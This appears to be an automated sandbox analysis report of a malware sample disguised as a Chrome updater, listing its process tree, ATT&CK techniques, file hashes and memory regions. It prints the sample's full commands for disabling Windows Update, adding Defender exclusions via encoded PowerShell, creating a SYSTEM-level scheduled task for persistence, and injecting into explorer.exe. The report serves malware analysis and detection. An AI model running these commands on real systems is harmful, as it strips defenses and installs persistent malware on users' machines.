"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1260

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:300

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:628

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1560

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1440

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:804

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1112

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:1892

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:828

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1776

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1088

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1608

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1776

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1396

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:836

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1984

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1556

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1632

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1636

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:628

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:572

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
4⤵
PID:1996

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
5⤵
- Creates scheduled task(s)
PID:868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1256

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:568

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\run.bat" "
2⤵
- Drops startup file
PID:300

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\lol.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1432

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:980

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1588

C:\Windows\system32\taskeng.exe
taskeng.exe {A25A9F97-9E56-419D-B620-9F57B8F956F7} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1160

C:\Program Files\Chrome\updater.exe
"C:\Program Files\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:300

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
4⤵
PID:368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1248

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1556

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1396

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1656

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1184

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:912

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1112

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:368

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:1432

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1396

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1220

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:836

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1576

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1132

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1632

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:856

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:912

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1556

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:368

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1168

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:828

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1516

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1548

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
PID:1184

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "lnftwwoznl"
5⤵
PID:1624

C:\Windows\explorer.exe
C:\Windows\explorer.exe jfkojmuoois1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
60KB

MD5
589c442fc7a0c70dca927115a700d41e

SHA1
66a07dace3afbfd1aa07a47e6875beab62c4bb31

SHA256
2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

SHA512
1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
304B

MD5
e9fbf49dc7e9283a246cf25eddfca152

SHA1
ae2daf728e6a2b699cb878219f9949ae7c8432ef

SHA256
b4a15b3ccac9d2f3075e684fa6cfd9d36ae7c496d97e19ed4cabac32d474aed4

SHA512
16679cdf1e8ac73f1430708f5380e4fd2d5d09fffc5739d7633b500048fcccc04935bfe05a82c5a549f358ad834686dce75fefd0f7cca509fa55143235ae8ecb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\YUWJMOAK.txt
Filesize
608B

MD5
3b6a545d2451c47ad172342b86f7d687

SHA1
08d0f887ba76e5b8a8b7b3b931ff11de5b1bd357

SHA256
2dfa556f60fb99de221d4d0280b91681b277b95b7b8743f1211981120244b88e

SHA512
ecbdfe2efd8dce9592e6b9b6f7ddcb7fad86aa361d9d8cefd465bae7882e17ff3980364ae9062f9b46bdc121cd8695155b84a389e327010d600c3656505eb3ee

Download Submit
C:\Windows\Temp\lol.bat
Filesize
59B

MD5
f580e0e80cc87b25e38ea2c0c8059d04

SHA1
299f51dca9c609d6da86f93c424e39c1e6ba0d94

SHA256
9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

SHA512
5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

Download Submit
C:\Windows\Temp\run.bat
Filesize
98B

MD5
731afe244b2414169a5f630d52646e56

SHA1
e3771ccdccd8c306ee5fc4f264cfc3310690458c

SHA256
6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

SHA512
84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

Download Submit
C:\Windows\Temp\setup.exe
Filesize
7.2MB

MD5
34114ac92707af5ed0825e37be5e7fb0

SHA1
0b52506b481afbe89682f50285ad4c79b9ead2e3

SHA256
9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

SHA512
44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

Download Submit
\Windows\Temp\setup.exe
Filesize
7.2MB

MD5
34114ac92707af5ed0825e37be5e7fb0

SHA1
0b52506b481afbe89682f50285ad4c79b9ead2e3

SHA256
9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

SHA512
44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

Download Submit
memory/300-111-0x0000000000400000-0x000000000106D000-memory.dmp

Filesize
12.4MB

Download
memory/300-59-0x0000000000000000-mapping.dmp

Download
memory/300-112-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/300-109-0x0000000000400000-0x000000000106D000-memory.dmp

Filesize
12.4MB

Download
memory/300-108-0x0000000000000000-mapping.dmp

Download
memory/300-113-0x0000000000400000-0x000000000106D000-memory.dmp

Filesize
12.4MB

Download
memory/300-80-0x0000000000000000-mapping.dmp

Download
memory/300-114-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/368-150-0x0000000000000000-mapping.dmp

Download
memory/368-137-0x0000000000000000-mapping.dmp

Download
memory/368-117-0x0000000000000000-mapping.dmp

Download
memory/548-134-0x0000000000000000-mapping.dmp

Download
memory/568-107-0x0000000000000000-mapping.dmp

Download
memory/572-105-0x0000000000000000-mapping.dmp

Download
memory/572-85-0x0000000000000000-mapping.dmp

Download
memory/628-115-0x000000001A7B0000-0x000000001ABCC000-memory.dmp

Filesize
4.1MB

Download
memory/628-104-0x0000000000000000-mapping.dmp

Download
memory/628-143-0x0000000000B10000-0x0000000000B16000-memory.dmp

Filesize
24KB

Download
memory/628-81-0x0000000000000000-mapping.dmp

Download
memory/804-84-0x0000000000000000-mapping.dmp

Download
memory/828-152-0x0000000000000000-mapping.dmp

Download
memory/828-128-0x0000000000000000-mapping.dmp

Download
memory/828-88-0x0000000000000000-mapping.dmp

Download
memory/836-99-0x0000000000000000-mapping.dmp

Download
memory/836-142-0x0000000000000000-mapping.dmp

Download
memory/856-147-0x0000000000000000-mapping.dmp

Download
memory/868-95-0x0000000000000000-mapping.dmp

Download
memory/912-70-0x0000000000000000-mapping.dmp

Download
memory/912-73-0x000007FEECE50000-0x000007FEED9AD000-memory.dmp

Filesize
11.4MB

Download
memory/912-90-0x0000000000000000-mapping.dmp

Download
memory/912-71-0x000007FEFBCA1000-0x000007FEFBCA3000-memory.dmp

Filesize
8KB

Download
memory/912-72-0x000007FEED9B0000-0x000007FEEE3D3000-memory.dmp

Filesize
10.1MB

Download
memory/912-74-0x0000000002354000-0x0000000002357000-memory.dmp

Filesize
12KB

Download
memory/912-148-0x0000000000000000-mapping.dmp

Download
memory/912-77-0x0000000002354000-0x0000000002357000-memory.dmp

Filesize
12KB

Download
memory/912-75-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/912-135-0x0000000000000000-mapping.dmp

Download
memory/912-78-0x000000000235B000-0x000000000237A000-memory.dmp

Filesize
124KB

Download
memory/912-76-0x000000000235B000-0x000000000237A000-memory.dmp

Filesize
124KB

Download
memory/920-93-0x0000000000000000-mapping.dmp

Download
memory/932-67-0x0000000000400000-0x000000000106D000-memory.dmp

Filesize
12.4MB

Download
memory/932-68-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/932-66-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/932-65-0x0000000000400000-0x000000000106D000-memory.dmp

Filesize
12.4MB

Download
memory/932-61-0x0000000000400000-0x000000000106D000-memory.dmp

Filesize
12.4MB

Download
memory/932-56-0x0000000000000000-mapping.dmp

Download
memory/1088-94-0x0000000000000000-mapping.dmp

Download
memory/1112-86-0x0000000000000000-mapping.dmp

Download
memory/1112-106-0x0000000000000000-mapping.dmp

Download
memory/1112-136-0x0000000000000000-mapping.dmp

Download
memory/1132-145-0x0000000000000000-mapping.dmp

Download
memory/1160-110-0x0000000001280000-0x0000000001EED000-memory.dmp

Filesize
12.4MB

Download
memory/1168-151-0x0000000000000000-mapping.dmp

Download
memory/1168-92-0x0000000000000000-mapping.dmp

Download
memory/1184-154-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1184-185-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1184-160-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1184-159-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1184-158-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1184-132-0x0000000000000000-mapping.dmp

Download
memory/1184-156-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1184-162-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1184-155-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1220-140-0x0000000000000000-mapping.dmp

Download
memory/1248-125-0x0000000000000000-mapping.dmp

Download
memory/1256-131-0x0000000000000000-mapping.dmp

Download
memory/1260-79-0x0000000000000000-mapping.dmp

Download
memory/1268-133-0x0000000000000000-mapping.dmp

Download
memory/1316-172-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-186-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-193-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-163-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-192-0x0000000000420000-0x0000000000440000-memory.dmp

Filesize
128KB

Download
memory/1316-166-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-168-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-170-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-164-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-179-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-173-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-178-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-174-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-184-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-182-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-180-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1316-176-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/1396-129-0x0000000000000000-mapping.dmp

Download
memory/1396-139-0x0000000000000000-mapping.dmp

Download
memory/1396-98-0x0000000000000000-mapping.dmp

Download
memory/1432-138-0x0000000000000000-mapping.dmp

Download
memory/1432-60-0x0000000000000000-mapping.dmp

Download
memory/1440-83-0x0000000000000000-mapping.dmp

Download
memory/1516-153-0x0000000000000000-mapping.dmp

Download
memory/1548-126-0x0000000000000000-mapping.dmp

Download
memory/1556-149-0x0000000000000000-mapping.dmp

Download
memory/1556-127-0x0000000000000000-mapping.dmp

Download
memory/1556-101-0x0000000000000000-mapping.dmp

Download
memory/1560-82-0x0000000000000000-mapping.dmp

Download
memory/1576-144-0x0000000000000000-mapping.dmp

Download
memory/1592-122-0x0000000001094000-0x0000000001097000-memory.dmp

Filesize
12KB

Download
memory/1592-124-0x000000000109B000-0x00000000010BA000-memory.dmp

Filesize
124KB

Download
memory/1592-120-0x000007FEECD70000-0x000007FEED793000-memory.dmp

Filesize
10.1MB

Download
memory/1592-118-0x0000000000000000-mapping.dmp

Download
memory/1592-121-0x000007FEEC210000-0x000007FEECD6D000-memory.dmp

Filesize
11.4MB

Download
memory/1592-123-0x0000000001094000-0x0000000001097000-memory.dmp

Filesize
12KB

Download
memory/1608-96-0x0000000000000000-mapping.dmp

Download
memory/1624-190-0x0000000000200000-0x0000000000206000-memory.dmp

Filesize
24KB

Download
memory/1624-191-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

